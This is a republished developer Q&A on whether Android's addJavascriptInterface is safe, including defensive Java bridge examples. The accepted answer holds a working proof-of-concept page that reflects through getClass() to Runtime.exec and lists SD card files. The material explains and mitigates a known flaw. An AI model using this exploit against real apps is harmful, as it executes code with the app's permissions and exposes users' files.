Is Android's JavascriptInterface secure? (security, Android, JavascriptInterface)

2023-09-12 23:58:31 Author: 我的耳旁有你的浅唱

From the documentation: http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29

"Using addJavascriptInterface() allows JavaScript to control your application. This can be a very useful feature or a dangerous security issue. When the HTML in the WebView is untrustworthy (for example, part or all of the HTML is provided by some person or process), then an attacker could inject HTML that will execute your code and possibly any code of the attacker's choosing. Do not use addJavascriptInterface() unless all of the HTML in this WebView was written by you. The Java object that is bound runs in another thread and not in the thread that it was constructed in."

Suppose I have an interface that only displays a custom dialog, or starts a download to the SD card. Would that be insecure, and could it be used from any URL? How could an attacking web page use the interface to run any code of the attacker's choosing?

Update: From the documentation:

This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLY_BEAN or below, because JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

Is there an example of how this could happen? Is this just saying that DOWNLOADINTERFACE.dangerousfunction could be called if that's a public method on that class?

Update:

I tested based on the example of the exploit below, sites can get access to the system through interfaces in Android 4.4, 4.1, and 3.2.

However, I was not seeing this bug on Android 2.2, or 2.3, the hack only causes a force-close. What is the best way to prevent this hack, other than not using JSInterface? Can I include bogus functions like this, to prevent unauthorized calling of functions?

public Object getClass() {
  //throw error, return self, or something?  
}

Or rewrite everything using ajax and intercepting calls? Would that result in better/worse performance?

Update:

I succeeded in removing the JS interface, and replaced the functionality by defining window.open(specialurl) commands for all the window.(interface) functions, and overriding those in the shouldOverrideUrlLoading. Strangely enough, window.open() must be used in some cases, or the webview breaks display (like javascript is stopping?), and in other cases location.replace should be used or it will just show a "interface://specialdata" could not be found message.

(I set settings.setJavaScriptCanOpenWindowsAutomatically(true) so window.open works from JS all the time.)

Anyone know the best way to rewrite an app with this behavior?
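The URL-scheme replacement described in the updates above (JavaScript navigates to a special URL, the app intercepts it in shouldOverrideUrlLoading and runs the matching native action) can be written as a small WebViewClient with an explicit allow-list of commands. The following is an added example and not the asker's code; the scheme name "interface", the command names "dialog" and "download", the Host callback interface and the placeholder host "yourserver.example" are all assumptions.

```java
// Added example: a command channel that needs no addJavascriptInterface() at all.
// JavaScript side (page you control), per the update above, uses either
//   window.open("interface://dialog?msg=" + encodeURIComponent(text))
// or
//   location.replace("interface://download?url=" + encodeURIComponent(fileUrl))
// The app side below consumes those navigations before the WebView tries to load them.
import android.net.Uri;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.HashSet;
import java.util.Set;

public class CommandBridgeClient extends WebViewClient {
    private static final String COMMAND_SCHEME = "interface";   // hypothetical scheme name

    // Only this origin may be loaded over https; every other navigation is dropped.
    private static final Set<String> ALLOWED_HOSTS = new HashSet<>();
    static {
        ALLOWED_HOSTS.add("yourserver.example");   // placeholder, not a real host
    }

    // Native actions the page is allowed to trigger (hypothetical interface).
    public interface Host {
        void showDialog(String message);
        void startDownload(String httpsUrl);
    }

    private final Host host;

    public CommandBridgeClient(Host host) {
        this.host = host;
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        Uri uri = Uri.parse(url);
        if (COMMAND_SCHEME.equals(uri.getScheme())) {
            dispatch(uri);
            return true;   // consumed: no "interface://... could not be found" page is shown
        }
        // Ordinary navigation: allow only https to the expected host, block everything else.
        boolean allowed = "https".equals(uri.getScheme()) && ALLOWED_HOSTS.contains(uri.getHost());
        return !allowed;
    }

    // interface://<command>?<params>  -> the "host" part of the URI is the command name.
    private void dispatch(Uri uri) {
        String command = uri.getHost() == null ? "" : uri.getHost();
        switch (command) {
            case "dialog": {
                String msg = uri.getQueryParameter("msg");   // already percent-decoded
                if (msg != null && msg.length() <= 512) {
                    host.showDialog(msg);
                }
                break;
            }
            case "download": {
                String target = uri.getQueryParameter("url");
                // The page chooses the URL, so constrain it; the app chooses the destination.
                if (target != null && target.startsWith("https://")) {
                    host.startDownload(target);
                }
                break;
            }
            default:
                // Unknown command: ignore. Nothing here is reachable by reflection,
                // because no Java object is ever injected into the page.
                break;
        }
    }
}
```

Because the only data crossing the boundary is a string URL, the page cannot reach any Java object or call methods that were not deliberately listed in dispatch(), which is the property the JS interface lacked on the affected versions. Each parameter is validated on the app side since it comes from page content.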

Accepted answer

An example of accessing SD card files from JavaScript:

<html>
  <head>
    <script>

      function getContents(inputStream)
      {
        var contents = "";
        var b = inputStream.read();
        var i = 1;
        while(b != -1) {
          var bString = String.fromCharCode(b);
          contents += bString;
          b = inputStream.read();
        }
        return contents;
      }

      function execute(cmdArgs)
      {
        //  go_back_js_interface_name is the registered java interface.
        //  it is an object, but is not iterable with for (var i in interface) {...}.
        return go_back_js_interface_name.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
      }

      var p = execute(["ls","/mnt/sdcard/"]);
      document.write(getContents(p.getInputStream()));

    </script>
  </head>
  <body>
    Test
  </body>
</html>
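The page above works because every public method of the injected object, including the inherited getClass(), is reachable from JavaScript on the affected versions, so the reflection chain getClass().forName(...) leads to Runtime.exec(). If the interface is kept, the hardened form is to annotate only the intended methods with @JavascriptInterface and target API level 17 (JELLY_BEAN_MR1) or higher, where the WebView exposes annotated methods only. The following is an added example and not the answer's or the asker's code; the class name DownloadBridge, the validation rules and the use of Context.getFilesDir() as the destination are assumptions.

```java
// Added example: the same "start a download" bridge, exposing exactly one method.
// With targetSdkVersion >= 17 and a device on API 17+, JavaScript can call only the
// methods carrying @JavascriptInterface; getClass() and other public methods are hidden.
import android.content.Context;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.io.File;

public class DownloadBridge {
    private final File downloadDir;   // chosen by the app, never by the page

    public DownloadBridge(File downloadDir) {
        this.downloadDir = downloadDir;
    }

    // Exposed to JavaScript as window.DownloadBridge.requestDownload(url, fileName).
    // Per the documentation quoted above this runs on a background thread, not the UI thread.
    @JavascriptInterface
    public boolean requestDownload(String url, String fileName) {
        // Both arguments come from page content and are treated as untrusted.
        if (url == null || !url.startsWith("https://")) {
            return false;
        }
        // A fixed character set and length: no path separators, no "..", no control chars.
        if (fileName == null || !fileName.matches("[A-Za-z0-9._-]{1,64}")) {
            return false;
        }
        File target = new File(downloadDir, fileName);
        // ... hand the (url, target) pair to DownloadManager on the UI thread (omitted)
        return true;
    }

    // Not annotated: on API 17+ with targetSdkVersion >= 17 this is invisible to JavaScript.
    public void internalHelper() {
    }

    // Wires the bridge into a WebView only where the annotation is actually enforced.
    public static void attach(WebView webView, Context context) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        settings.setAllowFileAccess(false);   // the page has no business reading local files

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new DownloadBridge(context.getFilesDir()), "DownloadBridge");
        }
        // On API 16 and below the annotation is ignored and getClass() stays reachable,
        // so no object is injected there; the page must degrade to a URL-scheme channel
        // or a "download unavailable" message instead.
    }
}
```

The version check is the important part: the annotation alone does nothing on JELLY_BEAN and earlier, which matches the documentation's warning that the reflection risk applies to applications targeting API level JELLY_BEAN or below. Returning a boolean from requestDownload lets the page tell a rejected request from an accepted one without exposing anything else.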